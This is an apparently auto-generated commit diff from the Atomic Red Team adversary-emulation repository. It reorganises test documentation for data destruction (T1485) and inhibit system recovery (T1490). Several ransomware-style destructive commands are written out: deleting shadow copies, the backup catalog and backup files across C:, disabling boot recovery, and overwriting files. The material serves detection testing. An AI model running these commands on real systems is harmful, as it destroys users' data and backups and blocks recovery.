security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=validate_atomics_generate_docs branch=master

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2020-04-01 00:05:53 +00:00
parent 0725ce58d1
commit c4cd523a8d
7 changed files with 91 additions and 199 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1485/T1485.md
+20 -123
View File
@@ -8,103 +8,16 @@ To maximize impact on the target organization in operations where network-wide a
## Atomic Tests
- [Atomic Test #1 - Windows - Delete Volume Shadow Copies](#atomic-test-1---windows---delete-volume-shadow-copies)
- [Atomic Test #1 - Windows - Overwrite file with Sysinternals SDelete](#atomic-test-1---windows---overwrite-file-with-sysinternals-sdelete)
- [Atomic Test #2 - Windows - Delete Windows Backup Catalog](#atomic-test-2---windows---delete-windows-backup-catalog)
- [Atomic Test #3 - Windows - Disable Windows Recovery Console Repair](#atomic-test-3---windows---disable-windows-recovery-console-repair)
- [Atomic Test #4 - Windows - Overwrite file with Sysinternals SDelete](#atomic-test-4---windows---overwrite-file-with-sysinternals-sdelete)
- [Atomic Test #5 - macOS/Linux - Overwrite file with DD](#atomic-test-5---macoslinux---overwrite-file-with-dd)
- [Atomic Test #6 - Windows - Delete Backup Files](#atomic-test-6---windows---delete-backup-files)
- [Atomic Test #2 - macOS/Linux - Overwrite file with DD](#atomic-test-2---macoslinux---overwrite-file-with-dd)
<br/>
## Atomic Test #1 - Windows - Delete Volume Shadow Copies
Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
**Supported Platforms:** Windows
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
vssadmin.exe delete shadows /all /quiet
```
<br/>
<br/>
## Atomic Test #2 - Windows - Delete Windows Backup Catalog
Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
**Supported Platforms:** Windows
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
wbadmin.exe delete catalog -quiet
```
<br/>
<br/>
## Atomic Test #3 - Windows - Disable Windows Recovery Console Repair
Disables repair by the Windows Recovery Console on boot.
This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
**Supported Platforms:** Windows
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
```
#### Cleanup Commands:
```cmd
bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
bcdedit.exe /set {default} recoveryenabled yes
```
<br/>
<br/>
## Atomic Test #4 - Windows - Overwrite file with Sysinternals SDelete
Overwrites and deletes a file using Sysinternals SDelete.
Requires the download of either Sysinternals Suite or the individual SDelete utility.
## Atomic Test #1 - Windows - Overwrite file with Sysinternals SDelete
Overwrites and deletes a file using Sysinternals SDelete. Upon successful execution, "Files deleted: 1" will be displayed in
the powershell session along with other information about the file that was deleted.
**Supported Platforms:** Windows
@@ -114,15 +27,15 @@ Requires the download of either Sysinternals Suite or the individual SDelete uti
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| sdelete_exe | Path of sdelete executable | Path | PathToAtomicsFolder&#92;T1485&#92;bin&#92;sdelete.exe|
| sdelete_exe | Path of sdelete executable | Path | $env:TEMP&#92;Sdelete&#92;sdelete.exe|
| file_to_delete | Path of file to delete | path | $env:TEMP&#92;T1485.txt|
#### Attack Commands: Run with `powershell`!
```powershell
New-Item $env:TEMP\T1485.txt
#{sdelete_exe} -accepteula $env:TEMP\T1485.txt
Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}"
```
@@ -132,14 +45,22 @@ New-Item $env:TEMP\T1485.txt
##### Description: Secure delete tool from Sysinternals must exist on disk at specified location (#{sdelete_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{sdelete_exe}) {0} else {1}
if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip"
Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force
New-Item -ItemType Directory (Split-Path "#{sdelete_exe}") -Force | Out-Null
Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}" -Force
Remove-Item $env:TEMP\SDelete.zip -Force
```
##### Description: The file to delete must exist at #{file_to_delete}
##### Check Prereq Commands:
```powershell
if (Test-Path #{file_to_delete}) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
New-Item #{file_to_delete} -Force | Out-Null
```
@@ -148,7 +69,7 @@ Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}" -Force
<br/>
<br/>
## Atomic Test #5 - macOS/Linux - Overwrite file with DD
## Atomic Test #2 - macOS/Linux - Overwrite file with DD
Overwrites and deletes a file using DD.
To stop the test, break the command with CTRL/CMD+C.
@@ -176,28 +97,4 @@ dd of=#{file_to_overwrite} if=#{overwrite_source}
<br/>
<br/>
## Atomic Test #6 - Windows - Delete Backup Files
Deletes backup files in a manner similar to Ryuk ransomware.
**Supported Platforms:** Windows
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk >nul 2>&1
```
<br/>
atomics/T1490/T1490.md
+32
View File
@@ -21,6 +21,8 @@ A number of native Windows utilities have been used by adversaries to disable or
- [Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShell](#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell)
- [Atomic Test #6 - Windows - Delete Backup Files](#atomic-test-6---windows---delete-backup-files)
<br/>
@@ -133,6 +135,11 @@ bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
```
#### Cleanup Commands:
```cmd
bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
bcdedit.exe /set {default} recoveryenabled yes
```
@@ -165,4 +172,29 @@ Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
<br/>
<br/>
## Atomic Test #6 - Windows - Delete Backup Files
Deletes backup files in a manner similar to Ryuk ransomware. Upon exection, many "access is denied" messages will appear as the commands try
to delete files from around the system.
**Supported Platforms:** Windows
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
```
<br/>
atomics/index.md
+3 -6
View File
@@ -493,12 +493,8 @@
- Atomic Test #1: Change User Password - Windows [windows]
- Atomic Test #2: Delete User - Windows [windows]
- [T1485 Data Destruction](./T1485/T1485.md)
- Atomic Test #1: Windows - Delete Volume Shadow Copies [windows]
- Atomic Test #2: Windows - Delete Windows Backup Catalog [windows]
- Atomic Test #3: Windows - Disable Windows Recovery Console Repair [windows]
- Atomic Test #4: Windows - Overwrite file with Sysinternals SDelete [windows]
- Atomic Test #5: macOS/Linux - Overwrite file with DD [linux, macos]
- Atomic Test #6: Windows - Delete Backup Files [windows]
- Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows]
- Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos]
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -511,6 +507,7 @@
- Atomic Test #3: Windows - Delete Windows Backup Catalog [windows]
- Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows]
- Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows]
- Atomic Test #6: Windows - Delete Backup Files [windows]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1496 Resource Hijacking](./T1496/T1496.md)
- Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux]
atomics/index.yaml
+32 -63
View File
@@ -15971,73 +15971,39 @@ impact:
modified: '2019-07-19T14:34:28.595Z'
identifier: T1485
atomic_tests:
- name: Windows - Delete Volume Shadow Copies
description: 'Deletes Windows Volume Shadow Copies. This technique is used by
numerous ransomware families and APT malware such as Olympic Destroyer.
'
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: 'vssadmin.exe delete shadows /all /quiet
'
- name: Windows - Delete Windows Backup Catalog
description: 'Deletes Windows Backup Catalog. This technique is used by numerous
ransomware families and APT malware such as Olympic Destroyer.
'
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: 'wbadmin.exe delete catalog -quiet
'
- name: Windows - Disable Windows Recovery Console Repair
description: |
Disables repair by the Windows Recovery Console on boot.
This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: |
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
cleanup_command: |
bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
bcdedit.exe /set {default} recoveryenabled yes
- name: Windows - Overwrite file with Sysinternals SDelete
description: |
Overwrites and deletes a file using Sysinternals SDelete.
Requires the download of either Sysinternals Suite or the individual SDelete utility.
Overwrites and deletes a file using Sysinternals SDelete. Upon successful execution, "Files deleted: 1" will be displayed in
the powershell session along with other information about the file that was deleted.
supported_platforms:
- windows
input_arguments:
sdelete_exe:
description: Path of sdelete executable
type: Path
default: PathToAtomicsFolder\T1485\bin\sdelete.exe
default: "$env:TEMP\\Sdelete\\sdelete.exe"
file_to_delete:
description: Path of file to delete
type: path
default: "$env:TEMP\\T1485.txt"
dependency_executor_name: powershell
dependencies:
- description: Secure delete tool from Sysinternals must exist on disk at specified
location (#{sdelete_exe})
prereq_command: 'if (Test-Path #{sdelete_exe}) {0} else {1}'
prereq_command: 'if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1}'
get_prereq_command: |-
Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip"
Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force
New-Item -ItemType Directory (Split-Path "#{sdelete_exe}") -Force | Out-Null
Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}" -Force
Remove-Item $env:TEMP\SDelete.zip -Force
- description: 'The file to delete must exist at #{file_to_delete}'
prereq_command: 'if (Test-Path #{file_to_delete}) { exit 0 } else { exit 1
}'
get_prereq_command: 'New-Item #{file_to_delete} -Force | Out-Null'
executor:
name: powershell
command: |
New-Item $env:TEMP\T1485.txt
#{sdelete_exe} -accepteula $env:TEMP\T1485.txt
command: 'Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}"
'
- name: macOS/Linux - Overwrite file with DD
description: |
Overwrites and deletes a file using DD.
@@ -16058,19 +16024,6 @@ impact:
name: bash
command: 'dd of=#{file_to_overwrite} if=#{overwrite_source}
'
- name: Windows - Delete Backup Files
description: 'Deletes backup files in a manner similar to Ryuk ransomware.
'
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.*
c:\backup*.* c:\*.set c:\*.win c:\*.dsk >nul 2>&1
'
'':
technique:
@@ -16250,6 +16203,9 @@ impact:
command: |
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
cleanup_command: |
bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
bcdedit.exe /set {default} recoveryenabled yes
- name: Windows - Delete Volume Shadow Copies via WMI with PowerShell
description: |
Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject.
@@ -16263,6 +16219,19 @@ impact:
elevation_required: true
command: 'Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
'
- name: Windows - Delete Backup Files
description: |
Deletes backup files in a manner similar to Ryuk ransomware. Upon exection, many "access is denied" messages will appear as the commands try
to delete files from around the system.
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.*
c:\backup*.* c:\*.set c:\*.win c:\*.dsk
'
T1496:
technique:
atomics/linux-index.md
+1 -1
View File
@@ -39,7 +39,7 @@
# impact
- [T1531 Account Access Removal](./T1531/T1531.md)
- [T1485 Data Destruction](./T1485/T1485.md)
- Atomic Test #5: macOS/Linux - Overwrite file with DD [linux, macos]
- Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos]
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
atomics/macos-index.md
+1 -1
View File
@@ -56,7 +56,7 @@
# impact
- [T1531 Account Access Removal](./T1531/T1531.md)
- [T1485 Data Destruction](./T1485/T1485.md)
- Atomic Test #5: macOS/Linux - Overwrite file with DD [linux, macos]
- Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos]
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
atomics/windows-index.md
+2 -5
View File
@@ -356,11 +356,7 @@
- Atomic Test #1: Change User Password - Windows [windows]
- Atomic Test #2: Delete User - Windows [windows]
- [T1485 Data Destruction](./T1485/T1485.md)
- Atomic Test #1: Windows - Delete Volume Shadow Copies [windows]
- Atomic Test #2: Windows - Delete Windows Backup Catalog [windows]
- Atomic Test #3: Windows - Disable Windows Recovery Console Repair [windows]
- Atomic Test #4: Windows - Overwrite file with Sysinternals SDelete [windows]
- Atomic Test #6: Windows - Delete Backup Files [windows]
- Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows]
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -373,6 +369,7 @@
- Atomic Test #3: Windows - Delete Windows Backup Catalog [windows]
- Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows]
- Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows]
- Atomic Test #6: Windows - Delete Backup Files [windows]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1496 Resource Hijacking](./T1496/T1496.md)
- T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)